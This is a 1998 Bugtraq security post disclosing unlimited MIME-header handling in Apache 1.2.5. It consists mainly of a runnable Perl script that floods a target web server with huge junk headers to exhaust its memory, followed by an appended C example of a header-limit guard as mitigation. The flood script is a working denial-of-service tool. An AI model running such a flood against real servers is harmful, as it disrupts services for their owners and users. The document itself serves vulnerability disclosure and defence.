Bugtraq mailing list archives
Web servers / possible DOS Attack / mime header flooding
From: facq () U-BORDEAUX FR (Laurent FACQ)
Date: Thu, 3 Sep 1998 12:34:22 +0200
#! /bin/perl

# mimeflood.pl - 02/08/1998 - L.Facq (facq () u-bordeaux fr)

# Web servers / possible DOS Attack / "mime header flooding"
#
# looking at the apache 1.2.5 source code i found
# that there was no limit on how many mime headers could
# be included in a client request. The only limits
# are : 8192 bytes for each header, 300 sec. on reading headers.
#
# => by sending a crazy amount of 8000 bytes headers, it's possible
# to consume a lot of memory (and of course CPU). The point
# is that httpd daemons grow and STAY at this big size (or die
# if you send too much)
#
# -> may be a limit on mime header number could be added.
#
# -> may be other web server could be vulnerable to this problem.
#
# - i tried on an apache 1.2.5 -> it works
# - i didn't install 1.3.1 but looking at the source code,
#   i think the problem is there too.
#
##################################################
#From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420
#
#[...]
#>
#> -> may be a limit on mime header number could be added.
#
#Such limits have already been added to 1.3.2-dev.
#
#.....Roy

use Socket;

# Usage : $0 host [port [max] ]

$max= 0;
if ($ARGV[2])
{
  $max= $ARGV[2];
}

$proto = getprotobyname('tcp');
socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
$port = 80;
if ($ARGV[1])
{
  $port= $ARGV[1];
}
$host = $ARGV[0];
$sin = sockaddr_in($port,inet_aton($host));
connect(Socket_Handle,$sin);

send Socket_Handle,"GET / HTTP/1.0\n",0;

$val= ('z'x8000)."\n";

$n= 1;
$|= 1;

while (Socket_Handle)
{
  send Socket_Handle,"Stupidheader$n: ",0;
  send Socket_Handle,$val,0;
  $n++;
  if (!($n % 100))
  {
    print "$n\n";
  }
  if ($max && ($n > $max))
  {
    last;
  }
}

print "Done: $n\n";
send Socket_Handle,"\n",0;

while (<Socket_Handle>)
{
  print $_;
}
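The mitigation the post asks for (a cap on the number of headers, next to the existing per-header size limit), shown as an added example that is not part of the original message or of Apache's code: a streaming guard that rejects a request head the moment it crosses a field-count, line-length or total-size limit. The limit values, the `hdr_guard` names and the `simulate` helper with its constructed input are assumptions for illustration.

```c
#include <stddef.h>
#include <stdio.h>
/* Assumed limits for this example (not taken from the post or from Apache). */
#define MAX_FIELDS 100u    /* header fields per request        */
#define MAX_LINE   8190u   /* bytes per line, excluding CR/LF  */
#define MAX_TOTAL  65536u  /* bytes for the whole request head */

typedef enum { HDR_MORE, HDR_DONE, HDR_LINE_TOO_LONG,
               HDR_TOO_MANY_FIELDS, HDR_TOO_LARGE } hdr_status;
typedef struct { size_t line_len, total; unsigned fields; int have_reqline; } hdr_guard;

/* Feed bytes as they arrive. Returns HDR_MORE until the blank line that ends
 * the head, or an error as soon as a limit is crossed, so the caller can
 * reject and close without buffering the rest of the flood. */
hdr_status hdr_guard_feed(hdr_guard *g, const char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (++g->total > MAX_TOTAL) return HDR_TOO_LARGE;
        if (buf[i] == '\r') continue;
        if (buf[i] != '\n') {
            if (++g->line_len > MAX_LINE) return HDR_LINE_TOO_LONG;
            continue;
        }
        if (g->line_len == 0 && g->have_reqline) return HDR_DONE; /* blank line ends head */
        if (g->line_len == 0) continue;        /* stray blank line before the request line */
        if (!g->have_reqline) g->have_reqline = 1;
        else if (++g->fields > MAX_FIELDS) return HDR_TOO_MANY_FIELDS;
        g->line_len = 0;                       /* folded continuation lines count as fields */
    }
    return HDR_MORE;
}

/* Constructed input: a request with nfields headers, each carrying vlen 'z' bytes. */
hdr_status simulate(unsigned nfields, size_t vlen)
{
    hdr_guard g = {0};
    hdr_status s = hdr_guard_feed(&g, "GET / HTTP/1.0\n", 15);
    for (unsigned f = 0; f < nfields && s == HDR_MORE; f++) {
        s = hdr_guard_feed(&g, "X-Pad: ", 7);
        for (size_t i = 0; i < vlen && s == HDR_MORE; i++) s = hdr_guard_feed(&g, "z", 1);
        if (s == HDR_MORE) s = hdr_guard_feed(&g, "\n", 1);
    }
    return s == HDR_MORE ? hdr_guard_feed(&g, "\n", 1) : s;
}

int main(void)
{
    printf("%d %d %d\n", simulate(10, 100), simulate(200, 10), simulate(50, 8000));
    return 0;
}
```

With only the per-line limit in place, the 8000-byte headers described in the post would pass every check; here the total-size cap stops them after a few fields, and the field-count cap stops floods of small headers.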